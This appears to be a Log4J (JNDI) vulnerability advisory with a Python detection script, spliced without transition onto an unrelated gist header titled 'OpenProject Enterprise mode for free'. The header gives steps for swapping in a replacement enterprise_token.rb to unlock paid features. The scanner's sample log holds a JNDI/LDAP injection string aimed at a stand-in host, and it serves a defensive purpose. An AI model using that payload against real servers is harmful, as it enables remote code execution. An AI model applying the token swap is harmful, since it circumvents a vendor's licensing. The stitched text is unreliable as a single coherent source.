

ssdrive ssdrive-flaktra


Log4J CVE Advisory

The Problem

Log4J supports lookups through the Java Naming and Directory Interface (shortened to JNDI in this document), a mechanism that lets a Java program reach out to an external source to retrieve data.
If a piece of text containing ${jndi:query} ends up in a log message, the Log4J library will try to resolve the query.
This can be combined with the Lightweight Directory Access Protocol (LDAP) to connect to a remote server.

However, because JNDI is built for retrieving data and runs as Java code, a JNDI query using LDAP that is written into a log makes the library connect to the given site, download a file, and then execute it.
This is known as Remote Code Execution (RCE).
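As an added detection example (not part of the advisory above), the script below scans log lines for the lookup syntax the advisory describes. A literal `${jndi:` expression is reported as a high-confidence hit; any other `${name:...}` lookup appearing in a field that should only hold user-supplied data (a User-Agent, a request path) is reported as medium, because lookup syntax has no business there either. The log lines and the host name `ldap-host.example` are constructed for the example.

```python
import re

# Matches a JNDI lookup such as ${jndi:ldap://...}; case-insensitive and
# tolerant of whitespace around the lookup name.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Matches any Log4J-style lookup of the form ${name:value}.
ANY_LOOKUP = re.compile(r"\$\{[^}]*:[^}]*\}")


def classify_line(line: str) -> str:
    """Return 'high' for a ${jndi:...} lookup, 'medium' for any other
    ${name:...} lookup syntax, and 'clean' otherwise."""
    if JNDI_LOOKUP.search(line):
        return "high"
    if ANY_LOOKUP.search(line):
        return "medium"
    return "clean"


def scan_log(lines):
    """Return (line_number, severity) for every line that is not clean."""
    hits = []
    for number, line in enumerate(lines, start=1):
        severity = classify_line(line)
        if severity != "clean":
            hits.append((number, severity))
    return hits


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://ldap-host.example/x}"',
    '10.0.0.7 - - "GET /login HTTP/1.1" 302 "${env:HOME}"',
    '10.0.0.3 - - "GET /robots.txt HTTP/1.1" 200 "curl/7.79"',
]

if __name__ == "__main__":
    for number, severity in scan_log(SAMPLE_LOG):
        print(f"line {number}: {severity} -> {SAMPLE_LOG[number - 1]}")
```

This is a triage aid for finding exploitation attempts in existing logs, not a fix: the lookup is resolved by the logging library before any log file is written, so the remedy is updating Log4J rather than filtering the log afterwards.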

@markasoftware
markasoftware / enterprise_token.rb
Last active December 12, 2025 03:54
OpenProject Enterprise mode for free
############ If you are using DOCKER all-in-one image, create Dockerfile like: ################
############ FROM openproject/openproject:16 ################
############ COPY ./enterprise_token.rb app/models/enterprise_token.rb ################
############ If you are running a manual installation: ################
############ REPLACE app/models/enterprise_token.rb in the source code with this file! ################
############ also be sure to RESTART OpenProject after replacing the file. ################
############ If using some other setup (eg docker-compose), read the comments on ################
############ https://gist.github.com/markasoftware/f5b2e55a2c2e3abb1f9eefcdf0bfff45 ################